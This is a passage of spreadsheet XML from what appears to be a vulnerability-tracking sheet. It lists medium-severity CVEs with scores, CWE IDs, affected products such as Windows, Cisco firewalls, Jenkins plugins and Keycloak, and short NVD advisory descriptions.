      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-805</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in SSL/TLS certificate parsing in the Snort 2 Detection Engine of Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the Snort 2 Detection Engine to restart.
This vulnerability is due to incomplete validation of the SSL certificate. An attacker could exploit this vulnerability by sending a crafted SSL connection setup request to be parsed by Snort 2. A successful exploit could allow the attacker to cause the Snort 2 Detection Engine to restart unexpectedly, resulting in a denial of service (DoS) condition.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20290</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54246</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>kubernetes, redis</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.27.13, the routesrv component serves cluster-wide control-plane data without application-layer authentication through /routes, /routes/{zone}, /swarm/redis/shards, and /swarm/valkey/shards. The handlers registered in routesrv/routesrv.go, eskipBytes.ServeHTTP in routesrv/eskipbytes.go, RedisHandler.ServeHTTP in routesrv/redishandler.go, and ValkeyHandler.ServeHTTP in routesrv/valkeyhandler.go only restrict HTTP methods and do not authenticate callers. A compromised or otherwise attacker-controlled pod that can reach routesrv on the Kubernetes cluster network can bypass its namespace-scoped RBAC and read Ingress and RouteGroup backend URLs, filter-chain and OAuth or OIDC path details, and Redis or Valkey shard addresses across namespaces. NetworkPolicy can restrict reachability but does not remove the missing-authentication condition, and the established impact is confidentiality exposure rather than direct integrity or availability loss. This issue is fixed in version 0.27.13.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54246</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K236"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236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K237"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237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K238"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238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K239"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239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K240"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240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K241"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241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K242"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242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K243"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243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K244"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244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K245"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245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88035</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>mongodb:c_driver</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>A size check in the client-side authentication path of the MongoDB C Driver can wrap around, so an unusually large user-name value is accepted and copied past the end of a small buffer. A party able to set the driver's connection settings may cause the application that embeds the driver to terminate unexpectedly. Reaching this code requires a build in which the optional external SASL authentication backend is present and a connection configured to use it.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88035</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92132</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>Jenkins Gradle Plugin 2.19.1252.v15196b_5a_6e10 and earlier requests build scan data from the build scan link detected in the build log, even when a Develocity server URL is configured in the global configuration, allowing attackers able to control the build log to capture the Develocity access key configured in the global configuration by having Jenkins connect to an attacker-specified URL.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92132</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92133</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>jenkins, gitlab</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>Jenkins GitLab Plugin 1.2149.vcfc32c82b_f7f and earlier caches the GitLab API client built for alternative GitLab API token credentials under a cache key derived from the credentials ID alone, omitting the folder in which the credentials are resolved, allowing attackers with Item/Configure permission to access GitLab API token credentials they are not entitled to use.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92133</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19607</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the first-broker-login flow of the keycloak-services component. This component handles the initial authentication and account linking when a user logs in via an external identity provider. The issue allows an attacker to register a matching username on an external provider to trigger a collision in Keycloak, which results in the legitimate user being locked out of their account.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19607</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20121</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the access control list (ACL) Object Group Search (OGS) implementation of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured access controls.
This vulnerability is due to a logic error in populating group access control policies (ACPs) with OGS configured. An attacker could exploit this vulnerability by sending traffic that should be blocked through the device. A successful exploit could allow the attacker to bypass access controls and reach devices in protected networks.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20121</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76433</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
